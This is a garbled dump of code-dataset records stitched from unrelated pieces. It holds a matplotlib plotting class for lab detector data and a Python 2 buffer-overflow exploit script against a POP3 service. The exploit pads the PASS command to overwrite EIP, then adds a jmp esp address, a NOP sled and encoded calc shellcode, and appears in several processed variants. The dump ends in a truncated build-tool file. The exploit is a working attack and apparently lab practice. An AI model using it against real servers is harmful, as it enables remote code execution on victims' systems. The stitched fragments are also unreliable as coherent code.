ax.spines['top'].set_visible(False)\n plt.ylabel(ylbl)\n plt.xlabel(xlbl)\n plt.title(plot_title)\n plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig(png_filename, bbox_inches='tight')\n\n def GenericCombinedPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst,\n xlbl, ylbl_lst, fig_title, png_filename, legend_h_offset=0.9,\n legend_v_offset=2.4, legend_location='center'):\n fig = plt.figure(figsize=(25, 9))\n ax = []\n for a in range(4):\n ax.append(fig.add_subplot(2, 2, 1 + a))\n ax[a].set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25,\n 0.84, 2)))\n for s in range(len(xdata_lst)):\n ax[a].plot(xdata_lst[s], ydata_lst[a][s], label=\n legendlbl_lst[s])\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel(ylbl_lst[a])\n if (a == 2 or a == 3) and s == 1:\n plt.xlabel(xlbl)\n elif (a == 0 or a == 1) and s == 1:\n ax[a].set_xticklabels([])\n ax[a].spines['bottom'].set_visible(False)\n ax[a].xaxis.set_ticks_position('none')\n plt.suptitle(fig_title, fontsize=20)\n plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig(png_filename, bbox_inches='tight')\n\n def Manual_OFN20fg_IDL(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[0.036614, 0.009674, 0.0056418, 0.004696], [0.0083151, \n 0.0044855, 0.0046082, 0.0033099]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('IDL pg')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.suptitle(\n 'IDL vs Detector Voltage Offset\\nOFN 0.02 pg On Column\\nQuant Mass = 271.99'\n , fontsize=20)\n plt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight')\n\n def Manual_GO_Plot(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[-7.7, 26.5, 42.8, 66.1], [-8, 4.1, 13.5, 48.4]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('Change in Optimized Detector Voltage')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.savefig('GO_Delta_Plot', bbox_inches='tight')\n plt.show()\n", "step-5": "import pandas as pd #@UnusedImport\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib #@UnusedImport\r\nimport numpy as np #@UnusedImport\r\n\r\nclass Plotter():\r\n\tdef __init__(self):\r\n\t\tself.red_hex_code = '#ff0000'\r\n\r\n\tdef AlkDMIonStatsSplitPlot(self, df):\r\n\t\tPV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique()\r\n\t\tPV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique()\r\n\t\tinst_sets = [PV1_DataSets_lst,PV2_DataSets_lst]\r\n\t\tax_title = ['Peg-BT PV1', 'Peg-BT PV2']\r\n\t\t\r\n\t\t\r\n\t\tfig = plt.figure(figsize=(25,9))\r\n\t\tax1 = fig.add_subplot(1,2,1)\r\n\t\tax2 = fig.add_subplot(1,2,2)\t\t\r\n\t\tax1.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,0.9,4))) #@UndefinedVariable\r\n\t\tax2.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,0.9,4))) #@UndefinedVariable\r\n\t\tax = [ax1,ax2]\r\n\t\t\r\n\t\tfor a in range(2):\r\n\t\t\t\r\n\t\t\tax[a].spines['right'].set_visible(False)\r\n\t\t\tax[a].spines['top'].set_visible(False)\r\n\t\t\tax[a].set_ylabel('Area Per Ion via Detector Measurement')\r\n\t\t\tax[a].set_xlabel('Alkane Standard\\nSample Injection Count')\r\n\t\t\tax[a].set_title(ax_title[a])\r\n\t\t\t\r\n\t\t\tfor dset in inst_sets[a]:\r\n\t\t\t\tdf_sliced = df[df['DataSet'] == dset].copy()\r\n\t\t\t\toffset = df_sliced['offset_volts'].iloc[2]\r\n\t\t\t\tdv = df_sliced['Det_Volts'].iloc[2]\r\n\t\t\t\tcurve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv)\r\n\t\t\t\tax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'], label=curve_label)\r\n\t\t\t\t\r\n\t\t\tax[a].legend(loc='center', bbox_to_anchor=(0.17,-0.1))\r\n\t\t\r\n# \t\tplt.suptitle('Tracking Area Per Ion via Detector Measurement\\nOver ~48 Hours of Continuous Sample Acquisition', fontsize=14)\r\n\t\tplt.savefig('DM_API_Analysis', bbox_inches='tight')\r\n\t\tplt.show()\r\n\r\n\r\n\t\r\n\tdef AlkDMIonStatsPlot(self, df):\r\n\t\tDataSets_lst = df['DataSet'].unique()\r\n\t\tfig = plt.figure(figsize=(15.5,9))\r\n\t\tax = fig.add_subplot(1,1,1)\r\n\t\tax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,1.00,8))) #@UndefinedVariable\r\n\t\t\r\n\t\tfor dset in DataSets_lst:\r\n\t\t\tdf_sliced = df[df['DataSet'] == dset].copy()\r\n\t\t\tinstrument = df_sliced['inst'].iloc[2]\r\n\t\t\toffset = df_sliced['offset_volts'].iloc[2]\r\n\t\t\tdv = df_sliced['Det_Volts'].iloc[2]\r\n\t\t\tcurve_label = 'Inst: {i} - Offset: +{v} v = {d} v'.format(i=instrument, v=offset, d=dv)\r\n\t\t\t\r\n\t\t\tax.plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'], label=curve_label)\r\n\t\t\r\n\t\tax.spines['right'].set_visible(False)\r\n\t\tax.spines['top'].set_visible(False)\r\n\t\t\r\n\t\tplt.ylabel('Ave. Aera Per Ion')\r\n\t\tplt.xlabel('Sample Injections')\r\n\t\tplt.title('Tracking Area Per Ion via Detector Measurement\\nOver ~48 Hours of Continuous Sample Acquisition')\r\n\r\n\t\tlegend_h_offset, legend_v_offset = 1.25, 0.75\r\n\t\tplt.legend(loc='center right', bbox_to_anchor=(legend_h_offset, legend_v_offset))\r\n\t\tplt.savefig('DM_API_Analysis', bbox_inches='tight')\r\n\t\tplt.show()\r\n\t\t\r\n\tdef GenericIndividualPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst, xlbl, ylbl, plot_title, png_filename, legend_h_offset=1.25, legend_v_offset=0.75, legend_location='center'):\r\n\t\t# xdata & ydata: both are a list of lists each containing the corresponding axis data. These are the requirement of these two\r\n\t\t\t# data set to prevent an error:\r\n\t\t\t\t# Sublists with the same index are a matching x vs y set that will be plotted. They MUST be the same length to prevent an error.\r\n\t\t\t\t# There must be the same number of sub lists to prevent an error.\r\n\t\t# legendlbl_lst: a list of legend labels for each x vs y plot. Again there must be the same number of items in this list as x/y pairs.\r\n\t\t# The rest are self explainatory\r\n\t\tfig = plt.figure(figsize=(15.5,9))\r\n\t\tax = fig.add_subplot(1,1,1)\r\n\t\t\r\n\t\tfor i in range(len(xdata_lst)):\r\n\t\t\tax.plot(xdata_lst[i], ydata_lst[i], color=self.color_codes[i], label=legendlbl_lst[i])\r\n\t\t\t\r\n\t\tax.spines['right'].set_visible(False)\r\n\t\tax.spines['top'].set_visible(False)\r\n\t\t\r\n\t\tplt.ylabel(ylbl)\r\n\t\tplt.xlabel(xlbl)\r\n\t\tplt.title(plot_title)\r\n\r\n\t\tplt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset, legend_v_offset))\r\n\t\tplt.savefig(png_filename, bbox_inches='tight')\r\n\t\t\r\n\t\t# (x_data, all_y_data, legendlbl_lst, xlbl, plot_titles, figure_title, all_png_filenames)\r\n\tdef GenericCombinedPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst, xlbl, ylbl_lst, fig_title, png_filename, legend_h_offset=0.9, legend_v_offset=2.4, legend_location='center'):\r\n\t\t# xdata_lst: is a list of lists each containing the corresponding x-axis data. The x-axis data is the same for all ax_n objects\r\n\t\t\t# Generic example: [Series_1_x-axis_data_lst, Series_n_x-axis_data_lst...]\r\n\t\t# ydata_lst: is a list of lists of lists containing all the y-axis data.\r\n\t\t\t# Generic example: [ax_1[Series_1_y-axis_data_lst, Series_n_y-axis_data_lst...], ax_n[ax_1[Series_1_y-axis_data_lst, Series_n_y-axis_data_lst...]...]\t\r\n\t\t\t# data set to prevent an error:\r\n\t\t\t\t# Sublists with the same index are a matching x vs y set that will be plotted. They MUST be the same length to prevent an error.\r\n\t\t\t\t# There must be the same number of sub lists to prevent an error.\r\n\t\t# legendlbl_lst: a list of legend labels for each x vs y plot. Again there must be the same number of items in this list as x/y pairs.\r\n\t\t# The rest are self explainatory\r\n\t\tfig = plt.figure(figsize=(25,9))\r\n\t\tax = []\r\n\t\t\r\n\t\tfor a in range(4):\r\n\t\t\tax.append(fig.add_subplot(2,2,1+a))\r\n\t\t\tax[a].set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable\r\n\t\t\t\r\n\t\t\tfor s in range(len(xdata_lst)):\r\n\t\t\t\tax[a].plot(xdata_lst[s], ydata_lst[a][s], label=legendlbl_lst[s])\r\n\t\t\t\tax[a].spines['right'].set_visible(False)\r\n\t\t\t\tax[a].spines['top'].set_visible(False)\r\n\t\t\t\tax[a].set_ylabel(ylbl_lst[a])\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\tif (a == 2 or a == 3) and s == 1:\r\n\t\t\t\t\tplt.xlabel(xlbl)\r\n\t\t\t\telif (a == 0 or a == 1) and s == 1:\r\n\t\t\t\t\tax[a].set_xticklabels([])\r\n\t\t\t\t\tax[a].spines['bottom'].set_visible(False)\r\n\t\t\t\t\tax[a].xaxis.set_ticks_position('none')\r\n\t\t\t\t\t\r\n\t\tplt.suptitle(fig_title, fontsize=20)\r\n\t\tplt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset, legend_v_offset))\r\n\t\tplt.savefig(png_filename, bbox_inches='tight')\r\n\t\t\r\n\tdef Manual_OFN20fg_IDL(self):\r\n\t\tfig = plt.figure(figsize=(25,9))\r\n\t\tax = fig.add_subplot(1,1,1)\r\n\t\tax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable\r\n\t\t\r\n\t\txdata = [0,150,250,350]\r\n\t\tydata = [[0.036614, 0.009674, 0.0056418, 0.004696],[0.0083151, 0.0044855, 0.0046082, 0.0033099]]\r\n\t\tlegendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\r\n\t\t\r\n\t\tfor s in range(len(ydata)):\r\n\t\t\tax.plot(xdata, ydata[s], label=legendlbl_lst[s])\r\n\t\t\t\r\n\t\tax.spines['right'].set_visible(False)\r\n\t\tax.spines['top'].set_visible(False)\r\n\t\tax.set_ylabel('IDL pg')\r\n\t\tax.set_xlabel('Optimized Detector Voltage Offset (volts)')\r\n\t\tplt.legend()\r\n\t\tplt.suptitle('IDL vs Detector Voltage Offset\\nOFN 0.02 pg On Column\\nQuant Mass = 271.99', fontsize=20)\r\n\t\tplt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight')\r\n\t\t\r\n\tdef Manual_GO_Plot(self):\r\n\t\tfig = plt.figure(figsize=(25,9))\r\n\t\tax = fig.add_subplot(1,1,1)\r\n\t\tax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable\r\n\t\t\r\n\t\txdata = [0,150,250,350]\r\n\t\tydata = [[-7.7, 26.5, 42.8, 66.1],[-8, 4.1, 13.5, 48.4]]\r\n\t\tlegendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\r\n\t\t\r\n\t\tfor s in range(len(ydata)):\r\n\t\t\tax.plot(xdata, ydata[s], label=legendlbl_lst[s])\r\n\t\t\t\r\n\t\tax.spines['right'].set_visible(False)\r\n\t\tax.spines['top'].set_visible(False)\r\n\t\tax.set_ylabel('Change in Optimized Detector Voltage')\r\n\t\tax.set_xlabel('Optimized Detector Voltage Offset (volts)')\r\n\t\tplt.legend()\r\n# \t\tplt.suptitle('Change in Optimized Detector Voltage\\nFrom the Beginning to the End of a Data Set', fontsize=20)\r\n\t\tplt.savefig('GO_Delta_Plot', bbox_inches='tight')\r\n\t\tplt.show()", "step-ids": [ 5, 6, 8, 9, 10 ] }
[ 5, 6, 8, 9, 10 ]
#!/usr/bin/env python2 import socket import struct RHOST = "10.10.10.2" RPORT = 110 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((RHOST, RPORT)) # OFFSETS # EIP 4654 # ESP 342 # EBP 4650 # jmp_esp in slmfc.dll at 5f4a358f jmp_esp = 0x5f4a358f nop_sled = "\x90" * 32 buf_totlen = 5000 offset_srp = 4654 shellcode_calc = b"" shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24" shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83" shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0" shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb" shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3" shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3" shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef" shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3" shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80" shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9" shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e" shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09" shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d" shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0" shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6" shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d" shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85" shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda" shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22" shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0" shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76" shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3" shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09" shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5" buf = "" buf += "A" * (offset_srp - len(buf)) buf += struct.pack("<I", jmp_esp) buf += nop_sled buf += shellcode_calc buf += "D"*(buf_totlen - len(buf)) data = s.recv(1024) s.send('USER username' + '\r\n') data = s.recv(1024) s.send('PASS ' + buf + '\r\n') data = s.recv(1024) s.close
normal
{ "blob_id": "280a4e1fb35937bb5a5c604f69337d30a4b956a9", "index": 6302, "step-1": "<mask token>\n", "step-2": "<mask token>\ns.connect((RHOST, RPORT))\n<mask token>\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\n<mask token>\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\n<mask token>\ns.send('USER username' + '\\r\\n')\n<mask token>\ns.send('PASS ' + buf + '\\r\\n')\n<mask token>\ns.close\n", "step-3": "<mask token>\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n", "step-4": "import socket\nimport struct\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n", "step-5": "#!/usr/bin/env python2\n\nimport socket\nimport struct\n\nRHOST = \"10.10.10.2\"\nRPORT = 110\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\n\n# OFFSETS\n# EIP 4654\n# ESP 342\n# EBP 4650\n# jmp_esp in slmfc.dll at 5f4a358f\njmp_esp = 0x5f4a358f\nnop_sled = \"\\x90\" * 32\n\nbuf_totlen = 5000\noffset_srp = 4654\n\nshellcode_calc = b\"\"\nshellcode_calc += b\"\\xba\\xd5\\x90\\xd2\\x7d\\xdb\\xd5\\xd9\\x74\\x24\"\nshellcode_calc += b\"\\xf4\\x58\\x31\\xc9\\xb1\\x36\\x31\\x50\\x13\\x83\"\nshellcode_calc += b\"\\xe8\\xfc\\x03\\x50\\xda\\x72\\x27\\x81\\x0c\\xf0\"\nshellcode_calc += b\"\\xc8\\x7a\\xcc\\x95\\x41\\x9f\\xfd\\x95\\x36\\xeb\"\nshellcode_calc += b\"\\xad\\x25\\x3c\\xb9\\x41\\xcd\\x10\\x2a\\xd2\\xa3\"\nshellcode_calc += b\"\\xbc\\x5d\\x53\\x09\\x9b\\x50\\x64\\x22\\xdf\\xf3\"\nshellcode_calc += b\"\\xe6\\x39\\x0c\\xd4\\xd7\\xf1\\x41\\x15\\x10\\xef\"\nshellcode_calc += b\"\\xa8\\x47\\xc9\\x7b\\x1e\\x78\\x7e\\x31\\xa3\\xf3\"\nshellcode_calc += b\"\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80\"\nshellcode_calc += b\"\\x04\\x38\\x4c\\xb9\\x0c\\x22\\x91\\x84\\xc7\\xd9\"\nshellcode_calc += b\"\\x61\\x72\\xd6\\x0b\\xb8\\x7b\\x75\\x72\\x75\\x8e\"\nshellcode_calc += b\"\\x87\\xb2\\xb1\\x71\\xf2\\xca\\xc2\\x0c\\x05\\x09\"\nshellcode_calc += b\"\\xb9\\xca\\x80\\x8a\\x19\\x98\\x33\\x77\\x98\\x4d\"\nshellcode_calc += b\"\\xa5\\xfc\\x96\\x3a\\xa1\\x5b\\xba\\xbd\\x66\\xd0\"\nshellcode_calc += b\"\\xc6\\x36\\x89\\x37\\x4f\\x0c\\xae\\x93\\x14\\xd6\"\nshellcode_calc += b\"\\xcf\\x82\\xf0\\xb9\\xf0\\xd5\\x5b\\x65\\x55\\x9d\"\nshellcode_calc += b\"\\x71\\x72\\xe4\\xfc\\x1f\\x85\\x7a\\x7b\\x6d\\x85\"\nshellcode_calc += b\"\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8e\\x69\\x4a\\xda\"\nshellcode_calc += b\"\\xeb\\x96\\xa8\\xcf\\x01\\x3f\\x75\\x9a\\xa8\\x22\"\nshellcode_calc += b\"\\x86\\x70\\xee\\x5a\\x05\\x71\\x8e\\x98\\x15\\xf0\"\nshellcode_calc += b\"\\x8b\\xe5\\x91\\xe8\\xe1\\x76\\x74\\x0f\\x56\\x76\"\nshellcode_calc += b\"\\x5d\\x61\\x3d\\xfc\\x7e\\x0b\\xce\\x99\\x0c\\xd3\"\nshellcode_calc += b\"\\x1f\\x03\\x95\\x77\\x7f\\xa5\\x34\\x13\\x1a\\x09\"\nshellcode_calc += b\"\\xd1\\x82\\x8f\\x2c\\x2f\\x35\\x2e\\xdc\\x3c\\xb5\"\n\nbuf = \"\"\nbuf += \"A\" * (offset_srp - len(buf))\nbuf += struct.pack(\"<I\", jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += \"D\"*(buf_totlen - len(buf))\n\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# # Copyright (c) 2011-2014 The developers of Aqualid project - http://aqualid.googlecode.com # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and # associated documentation files (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, publish, distribute, # sublicense, and/or sell copies of the Software, and to permit persons to whom # the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or # substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE # AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __all__ = ( 'BuildManager', 'ErrorNodeDependencyCyclic', 'ErrorNodeDependencyUnknown', ) import os.path from aql.util_types import toSequence, AqlException from aql.utils import eventStatus, eventWarning, eventError, logInfo, logError, logWarning, TaskManager from aql.values import 